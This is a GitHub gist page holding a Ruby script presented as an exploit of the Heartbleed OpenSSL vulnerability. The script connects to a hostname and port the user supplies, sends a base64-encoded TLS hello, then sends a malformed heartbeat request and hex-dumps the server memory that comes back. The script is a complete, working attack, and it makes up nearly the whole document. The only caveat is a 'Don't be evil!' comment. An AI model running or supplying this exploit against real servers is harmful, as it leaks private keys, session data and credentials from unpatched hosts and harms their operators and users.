Skip to content

@justinwsmith /heartbleed.rb
Last active

Embed URL

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
A Ruby exploit of the heartbleed OpenSSL vulnerability
# Copyright (c) 2014 Justin W. Smith
# Don't be evil!
require 'base64'
require 'socket'
require 'optparse'
options = {port: 443}
optparser = OptionParser.new do |opts|
opts.banner = "Usage: heartbleed.rb [options] hostname"
opts.on("-p", "--port PORT", Integer, "Port number") do |port|
options[:port] = port
end
end
optparser.parse!
if ARGV.length != 1
puts optparser.to_s
exit 1
end
HELLO = 5.times.collect { Base64.decode64(DATA.readline) }.join('')
HB = Base64.decode64(DATA.readline)
def display str, counter = 0
str.each_byte.each_slice(16) do |bytes|
print "%04x: " % counter
print bytes.map{|x| "%02x" % x}.join(" ")
print " " * (16 - bytes.length)
print " | "
print bytes.map{|x| (32..126) === x ? x.chr : "."}.join("")
counter += 1
puts
end
counter
end
Socket.tcp(ARGV[0], options[:port]) do |sock|
puts "SENDING HELLO"
sock.write(HELLO)
*vals = sock.readpartial 4096
puts "SENDING HEARTBEAT"
counter = 0
flag = false
sock.sendmsg(HB)
until sock.eof?
*vals = sock.readpartial 4096
if vals[0].length > 0
counter = display vals[0], counter
flag = false
elsif !flag
flag = true
else
break
end
end
end
__END__
FgMCANwBAADYAwJTQ1uQnZtyC7wMvCuSqEiXz705BMwWCoUDkJ93BDPU3gAA
ZsAUwArAIsAhADkAOACIAIfAD8AFADUAhMASwAjAHMAbABYAE8ANwAMACsAT
wAnAH8AeADMAMgCaAJkARQBEwA7ABAAvAJYAQcARwAfADMACAAUABAAVABIA
CQAUABEACAAGAAMA/wEAAEkACwAEAwABAgAKADQAMgAOAA0AGQALAAwAGAAJ
AAoAFgAXAAgABgAHABQAFQAEAAUAEgATAAEAAgADAA8AEAARACMAAAAPAAEB
GAMCAAMBQAA=
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.